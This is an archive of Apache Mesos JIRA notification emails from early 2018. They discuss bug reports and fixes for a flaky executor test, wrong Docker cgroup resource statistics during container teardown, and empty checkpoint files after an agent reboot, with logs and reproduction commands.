[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
[ https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16337043#comment-16337043 ] Qian Zhang commented on MESOS-8305: --- commit 180129dbd2cc2d8e130e860a4de30d211a69f6be Author: Qian Zhang Date: Tue Jan 23 08:33:03 2018 +0800 Fixed a race in the test `ROOT_MultiTaskgroupSharePidNamespace`. In the test `DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace`, we read the file `ns` in each of the two task's sandbox and check if their contents (the pid namespace of the task itself) are same. However it is possible we do the read for the second task after that file is created but before it is written, i.e., the content we read from the `ns` file of the second task would be empty which will cause the check failed. In this patch, we read the file `ns` for each task in a while loop, and only break from the loop when both task's files are not empty. Review: https://reviews.apache.org/r/65278 > DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky. > -- > > Key: MESOS-8305 > URL: https://issues.apache.org/jira/browse/MESOS-8305 > Project: Mesos > Issue Type: Bug > Environment: Ubuntu 16.04 > Fedora 23 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > Labels: flaky-test > Fix For: 1.6.0 > > Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt > > > On Ubuntu 16.04: > {noformat} > ../../src/tests/default_executor_tests.cpp:1877 > Expected: strings::trim(pidNamespace1.get()) > Which is: "4026532250" > To be equal to: strings::trim(pidNamespace2.get()) > Which is: "" > {noformat} > Full log attached. > On Fedora 23: > {noformat} > ../../src/tests/default_executor_tests.cpp:1878 > Expected: strings::trim(pidNamespace1.get()) > Which is: "4026532233" > To be equal to: strings::trim(pidNamespace2.get()) > Which is: "" > {noformat} > The test became flaky shortly after MESOS-7306 has been committed and likely > related to it. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480: -- Description: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//cgroup}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} was: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1 > > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//cgroup}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then
[jira] [Commented] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
[ https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336793#comment-16336793 ] Chun-Hung Hsiao commented on MESOS-8481: [~jieyu] pointed out that {{rename}} without {{fsync}} might have a "zero-length problem": https://stackoverflow.com/a/41362774 Related article: https://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/ > Agent reboot during checkpointing may result in empty checkpoints. > -- > > Key: MESOS-8481 > URL: https://issues.apache.org/jira/browse/MESOS-8481 > Project: Mesos > Issue Type: Bug >Reporter: Chun-Hung Hsiao >Assignee: Michael Park >Priority: Major > > An empty checkpoint file was created due to the following incident. > At 17:12:25, the master assigned a task to an agent: > {noformat} > I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources > cpus(allocated: *):0.1; mem(allocated: *):128 on agent > aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 > () > I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework > 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at > scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources > [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at > slave(1)@:5051 () > {noformat} > Meanwhile, the agent is being rebooted: > {noformat} > $ last reboot > reboot system boot 3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09 (06:55) > {noformat} > The agent log did not show any information about the task, possibly because > there was no fsync before reboot: > {noformat} > I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal > 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' > -- Reboot -- > I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: > /var/log/mesos/mesos-agent.log > {noformat} > However, the agent was checkpointing the task before reboot: > {noformat} > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ > Size: 39Blocks: 0 IO Block: 4096 directory > Device: ca40h/51776d Inode: 67306254Links: 3 > Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-24 00:23:43.237322609 + > Modify: 2018-01-23 17:12:25.751463030 + > Change: 2018-01-23 17:12:25.751463030 + > Birth: - > {noformat} > And since there was no fsync before reboot, all checkpoints resulted in empty > files: > {noformat} > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776dInode: 33967500Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-23 17:15:41.485506070 + > Modify: 2018-01-23 17:12:25.749463047 + > Change: 2018-01-23 17:12:25.749463047 + > Birth: - > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776dInode: 33967495Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-23 23:00:42.190975780 + > Modify: 2018-01-23 17:12:25.749463047 + > Change: 2018-01-23 17:12:25.749463047 + > Birth: - > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776d Inode: 67306255Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) >
[jira] [Updated] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
[ https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8481: --- Description: An empty checkpoint file was created due to the following incident. At 17:12:25, the master assigned a task to an agent: {noformat} I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources cpus(allocated: *):0.1; mem(allocated: *):128 on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () {noformat} Meanwhile, the agent is being rebooted: {noformat} $ last reboot reboot system boot 3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09 (06:55) {noformat} The agent log did not show any information about the task, possibly because there was no fsync before reboot: {noformat} I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' -- Reboot -- I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: /var/log/mesos/mesos-agent.log {noformat} However, the agent was checkpointing the task before reboot: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ Size: 39 Blocks: 0 IO Block: 4096 directory Device: ca40h/51776dInode: 67306254Links: 3 Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-24 00:23:43.237322609 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} And since there was no fsync before reboot, all checkpoints resulted in empty files: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967500Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:15:41.485506070 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967495Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 23:00:42.190975780 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 67306255Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:12:25.751463030 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} So were {{forked.pid}} and {{task.info}}. As a result, the agent failed to recover after reboot: {noformat} E0123 17:15:41.00 2709 slave.cpp:6800] EXIT with status 1: Failed to perform recovery: Failed to recover framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from '/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info': Found an empty file {noformat} The error came from
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480: -- Fix Version/s: 1.5.1 1.4.2 1.3.2 > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1 > > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.
[ https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336718#comment-16336718 ] Qian Zhang commented on MESOS-8462: --- commit 12faca980084c565efdd3b0cfbb3b272d530ba5a Author: Qian Zhang Date: Mon Jan 22 16:14:27 2018 +0800 Updated `SlaveRecoveryTest.RecoverCompletedExecutor` to verify gc. In the test `SlaveRecoveryTest.RecoverCompletedExecutor`, when the completed executor is recovered, verify its work and meta directories gc'ed successfully. Review: https://reviews.apache.org/r/65263 > Unit test for `Slave::detachFile` on removed frameworks. > > > Key: MESOS-8462 > URL: https://issues.apache.org/jira/browse/MESOS-8462 > Project: Mesos > Issue Type: Improvement >Reporter: Chun-Hung Hsiao >Assignee: Qian Zhang >Priority: Major > Labels: mesosphere > Fix For: 1.6.0 > > > We should add a unit test for MESOS-8460. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336710#comment-16336710 ] Jie Yu commented on MESOS-8480: --- commit 1382e595fa5e82f9917df97fbed76f77140ecc1e (HEAD -> master, origin/master, origin/HEAD) Author: Chun-Hung HsiaoDate: Tue Jan 23 17:13:05 2018 -0800 Fixed resource statistics for Docker containers being destroyed. If a process has exited, but not reaped yet (zombie procses), `/proc//cgroup` will still exist, but the process's cgroup will be reset to the root cgroup. In DockerContainerizer, we rely on `/proc//cgroup` to get the cpu/memory statistics of the container. If the `usage` call happens when the process is a zombie, the cpu/memory statistics will actually be that of the root cgroup, which is obviously not correct. See more details in MESOS-8480. This patch fixed the issue by checking if the cgroup of a given pid is root cgroup or not. Review: https://reviews.apache.org/r/65301/ > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Fix For: 1.6.0 > > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480: -- Fix Version/s: 1.6.0 > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Fix For: 1.6.0 > > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336702#comment-16336702 ] Qian Zhang commented on MESOS-6822: --- RR: https://reviews.apache.org/r/65306/ > CNI reports confusing error message for failed interface setup. > --- > > Key: MESOS-6822 > URL: https://issues.apache.org/jira/browse/MESOS-6822 > Project: Mesos > Issue Type: Bug > Components: network >Affects Versions: 1.1.0 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > > Saw this today: > {noformat} > Failed to bring up the loopback interface in the new network namespace of pid > 17067: Success > {noformat} > which is produced by this code: > https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859 > Note that ssh'ing into the machine confirmed that {{ifconfig}} is available > in {{PATH}}. > Full log: http://pastebin.com/hVdNz6yk -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
Chun-Hung Hsiao created MESOS-8481: -- Summary: Agent reboot during checkpointing may result in empty checkpoints. Key: MESOS-8481 URL: https://issues.apache.org/jira/browse/MESOS-8481 Project: Mesos Issue Type: Bug Reporter: Chun-Hung Hsiao Assignee: Michael Park An empty checkpoint file was created due to the following incident. At 17:12:25, the master assigned a task to an agent: {noformat} I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources cpus(allocated: *):0.1; mem(allocated: *):128 on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () {noformat} Meanwhile, the agent is being rebooted: {noformat} $ last reboot reboot system boot 3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09 (06:55) {noformat} The agent log did not show any information about the task, possibly because there was no fsync before reboot: {noformat} I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' -- Reboot -- I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: /var/log/mesos/mesos-agent.log {noformat} However, the agent was checkpointing the task before reboot: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ Size: 39 Blocks: 0 IO Block: 4096 directory Device: ca40h/51776dInode: 67306254Links: 3 Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-24 00:23:43.237322609 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} And since there was no fsync before reboot, all checkpoints resulted in empty files: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file 